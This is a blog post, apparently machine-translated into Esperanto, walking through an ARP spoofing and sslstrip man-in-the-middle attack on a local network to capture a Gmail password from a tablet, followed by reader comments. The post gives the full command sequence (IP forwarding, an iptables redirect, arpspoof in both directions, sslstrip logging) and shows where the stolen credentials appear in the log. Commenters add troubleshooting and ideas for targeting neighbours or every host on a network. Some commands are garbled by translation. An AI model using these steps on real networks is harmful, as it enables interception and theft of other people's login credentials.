ArpSpoofing kaj SSlstrip en Ago.

Saluton Blogantoj.

Por hodiaŭ mi havas malgrandan specimenon pri tio, kiom danĝere povas esti konektiĝi en iu ajn reto sen sekureco de tiuj, kiuj tiom multaj el ni ŝatas.

Por hodiaŭ mi uzos ArpSpoofing kun Sslstrip por akiri pasvorton de Gmail. Por kontroli la medion, mi kreis konton nomatan "testarp@gmail.com".

Kaj ĉar mi ne tre ŝatas preambulojn, ni ekkomercu.

Mi iam ne respondecas pri tio, kion ili povas fari per la jenaj informoj. Mi faras ĝin ekskluzive por edukaj celoj

MEDIO

Por ĉi tiu testo, ni havas la jenon:

1. Atakanto: Estas mia labortablo aŭ surtabla komputilo, kiu havas Debian Wheezy. De deponejoj vi povas instali sslstrip y dsniff ekhavi havi arpsspoofing

2. Viktimo: La viktimo estas Android-Tablojdo, kiu nur volas vidi sian poŝton per la retumilo.

3. La mediumo: La mezo estas mia Cisco DPC2425-Enkursigilo

ADRESOJ.

Adreso de la atakanto: 172.26.0.2

Router-Adreso: 172.26.0.1

Adreso de Viktimo: 172.26.0.8

LA ATAKO:

Por kompreni iom pli kiel funkcias la atako, vi povas iri al mia malnova POST

La unua afero, kiun ni faros por ĉi tiu atako, estas aktivigi la antaŭen por ke nia komputilo povu plusendi la informojn al la viktimo sen ke ili rimarku ĝin. (Alie ĝi estus neado de servaj atako)

Por tio ni uzos:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Ĉiu komando en rekta konzola fenestro.

Nun se ni faras voston -f de linux, ni vidas la informojn vive kaj rekte

 

momentfoto1

 

Do kiel ni akiras tion, kion ni volas?

Ni unue eniru nian poŝton sur la Tablojdo. Ensalutante, ni vidas, ke miloj kaj miloj da aferoj aperas sur nia konzolo.

Nun, kiam vi finis, ni malfermos nian dosieron "desdelinux" per nano

nano desdelinux

per Control + W ni serĉas ion nomatan SECURE POST.

Kaj ni vidos ion tian.

 

momentfoto2

 

Inter tiu grandega linio ne videbla estas la retpoŝto kaj pasvorto de la viktimo.

Do ni kuras dekstren ĝis ni fine vidas la lumon ĉe la fino de la tunelo.

 

momentfoto3

 

Alifoje ni vidos, kiel ni povas iom protekti nin kontraŭ ĉi tiuj atakoj.

salutoj


La enhavo de la artikolo aliĝas al niaj principoj de redakcia etiko. Por raporti eraron alklaku Ĉi tie.

27 komentoj, lasu la viajn

Lasu vian komenton

Via retpoŝta adreso ne estos eldonita. Postulita kampojn estas markita per *

*

*

  1. Respondeculo pri la datumoj: Miguel Ángel Gatón
  2. Celo de la datumoj: Kontrola SPAM, administrado de komentoj.
  3. Legitimado: Via konsento
  4. Komunikado de la datumoj: La datumoj ne estos komunikitaj al triaj krom per laŭleĝa devo.
  5. Stokado de datumoj: Datumbazo gastigita de Occentus Networks (EU)
  6. Rajtoj: Iam ajn vi povas limigi, retrovi kaj forigi viajn informojn.

  1.   @Jlcmux diris

    Mi profitas ĉi tiun okazon por diri, ke kiam la afiŝo estis publikigita, la ordonoj ne pravis.

    Al la fino de la komando iptables mankas la 8080, kiu estas sur alia linio. Kaj tiam la arpspoof-komandoj estis ĉiuj sur la sama linio. Ĉiu komando estas sur malsama linio.

    Espereble la redaktoro vidas ĝin kaj povas ripari ĝin.

    Salutojn.

    1.    Manlibro de la Fonto diris

      Mi faris la korektojn, kiujn vi mencias, ĉu bone?

      Se vi enmetos kodon en preferatan eniron, uzu la HTML-vidon kaj kontrolu, ke la artikolo ĝustas antaŭ ol sendi ĝin al pritraktata. Dankon.

  2.   Ludoviko diris

    Estas timiga scii, ke tiuj el ni, kiuj ne havas scion, estas tiel vundeblaj. Tre bonaj informoj eĉ kiam mi malmulte komprenas la temon, mi rimarkas la gravecon. Dankon!
    salutoj

  3.   Giskard diris

    Sed tio funkcias nur se la atakanto kaj la viktimo estas en la sama reto. Ĉiukaze ŝajnas al mi, ke se (estante en la sama reto) vi konektas per HTTPS, tio ne okazas, ĉar la datumoj estas ĉifritaj ANTAE foriri de via maŝino. Se vi konektas per HTTP (sen S) mi pensas, ke eĉ rigardante la retan kablon, vi vidas la klavojn.

    1.    @Jlcmux diris

      Ĝi ne estas vera. Mi hakas gmail-pasvorton kaj se vi rimarkas, ke gmail uzas https. Do? La afero estas, ke kvankam https estas sekura, ĝi dependas de http. Do ĝi ne estas tiel sekura.

      Ne konfesu tiom pri https, ke la S ne estas por Superman, ĝi estas por "sekura"

    2.    RTen diris

      ĝi funkcias kun aŭ sen https, mi provis ĝin per pli faka linux-distro kaj ĝi funkcias senprobleme

    3.    Manlibro de la Fonto diris

      Vi povas precize uzi ĝin por doni lecionon al tiuj, kiuj ŝtelas vian retkonekton. 😀

      Ĝi pli-malpli similas al tio, kion ili diris antaŭ longe en la blogo de Chema Alonso:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Rayonanta diris

        Ostioj, bonege kion ĝi faras! / Kaj tiam ili diras al mia paranoja ĉiufoje, ke mi uzas la VPN kiam ili iras por kontroli la bankan konton ...). Cetere vi devas vidi, kiel cinikaj homoj estas en la komentoj ...

        1.    eliotime3000 diris

          Nun ni devas preni lernilon pri kiel krei kaj oferti vian propran VPN-servon.

      2.    daniel diris

        La historio, kiun vi ligas, estas tre interesa, ĝi eĉ ŝajnas inda je nova libro, kaj tio memorigas min, kiam mi uzis la interreton de miaj najbaroj kaj kvankam mi diras, ke mi konas la temon, mi pensas, ke mi neniam povus vidi la verajn dimensiojn de la danĝero, ke mi povus daŭri, bonŝance por mi, ili nur ŝanĝis la pasvorton al WPA2 kaj jen mia historio kun la ISP komenciĝis haha

    4.    Mauricio diris

      Tial la titolo diras Sslstrip en ago.

      Ĝi funkcias, kondiĉe ke la atakanto estas en la mezo

  4.   anon diris

    Kiun ondon vi laboras ĉe prismo? -.-
    Ne.
    Kion vi atendas por sendi vian peton XD
    salutojn
    bona afiŝo

  5.   auroszx diris

    Interese, mi faros edukan teston poste ... Eble mi eĉ povus forigi la pasvorton al la WiFi kaj amuzi iomete 😛
    Ĉu hazarde vi povas fari ion similan por sendi malsamajn paĝojn al tiuj, kiujn la celo petis? Ekzemple, ili volas malfermi Facebook kaj mi redirektas ilin al Google? 😛

    1.    @Jlcmux diris

      Jes. Sed ĉio estas tre malsama listo.

      Eble mi afiŝos ĝin poste.

  6.   lasta novulo diris

    tre bona afiŝo, ĉi tiuj temoj estas tre edukaj, nun ni devas povi kontraŭstari ĉi tiun atakon, ĉar iuj (kiel mi) konektas al publikaj retoj (la universitato ekzemple) estus utile eviti ĝin.

    Dankon!

  7.   nur-alia-dl-uzanto diris

    Ĝi ne funkciis por mi 🙁

  8.   Ŭaŭ diris

    Io malsukcesas min ĉi tie, krom la fakto, ke la https-ligoj estas ĉifritaj per servila atestilo (post kiam vi havas la atestilon en via maŝino, via retumilo respondecas pri la ĉifrado) per iptables vi redirektas havenon 80 (http), ne 443 , kiu estas https

    1.    @Jlcmux diris

      Mi ankaŭ pensis tiel. La afero estas, ke kvankam https estas "sekura", ĝi bedaŭrinde dependas de http. Do sslstrip profitas de tio, ĝi kredigas al la retumilo, ke ĝi uzas https-akreditaĵojn, sed ne.

      1.    Ŭaŭ diris

        sankta feko! sed la retumilo devas vidi averton kiel "ĉi tiu atestilo venas de suspektinda retejo aŭ io simila" ... Mi certe devos fari provojn XD

        1.    @Jlcmux diris

          Ne, absolute nenio aperas.

  9.   nur-alia-dl-uzanto diris

    Ĝi fine funkciis por mi
    Mi estas konektita en reto WEP kun pasvorto, kaj ĝi montris al mi la pasvorton rekte ĉiuokaze.

    Demando. Ĉu vi povas fari la saman procedon krom por ĉiuj komputiloj konektitaj en la reto, anstataŭ havi unu viktimon?

    1.    @Jlcmux diris

      Jes vi povas. Sed mi ne faris eksperimentojn. Provu ĝin mem kaj diru al ni, kiel vi fartas.

  10.   Sinnick19 diris

    La sola afero, kiun mi ricevas per tio, estas, ke la maŝino de la viktimo malkonektas, sed la sslstrip nenion montras al mi: /

    1.    @Jlcmux diris

      Vi devas malŝalti la fajromuron dum momento. Aŭ almenaŭ ebligu alvenantajn konektojn.

  11.   Sinjoro Nigro diris

    Probe kaj mi povis vidi nur la uzantnomon kaj pasvorton de la paĝo de facebook, en gmail mi ne trovis rezulton en la protokolo, ankaŭ mi bezonis nur linion de arpspoof «arpspoof -i -t«. Aliflanke, la viktima maŝino ne povis malfermi iujn paĝojn. Mi daŭre esploros, ĝi estas tre interesa. Helpo por tiuj, kiuj uzas Manjaron, la instalotaj pakoj estas: dsniff (jen arpspoff), tordita kaj python2-pyopenssl. Sslstrip elŝuteblas de ĉi tie: http://www.thoughtcrime.org/software/sslstrip/
    Por funkciigi ĝin $ python2 sslstrip.py
    Salutojn.

  12.   Sinjoro Nigro diris

    Ĝi ne aperis, sed la arpspoof-linio estas: #arpspoof -i int -t ip-victim ip-router

  13.   Gilbert diris

    rigardu, mi faras ĝuste tion, kion vi diras:

    echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT-to-ports 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    La problemo estas, ke la viktimo, kiu estas alia komputilo, kiun mi havas ĉi tie en mia ĉambro, restas sen konekto al la punkto, ke mi devas rekomenci la enkursigilon, kion mi povas fari, helpu min.

    Alian aferon mi laboras per virtuala maŝino, kaj kiam mi ekzekutas la komandon iwconfig, wlan0 ne aperas, nek kiam mi ekzekutas ifconfig, tamen se mi havas interreton en mia virtuala maŝino, kio kun eth0-interfaco.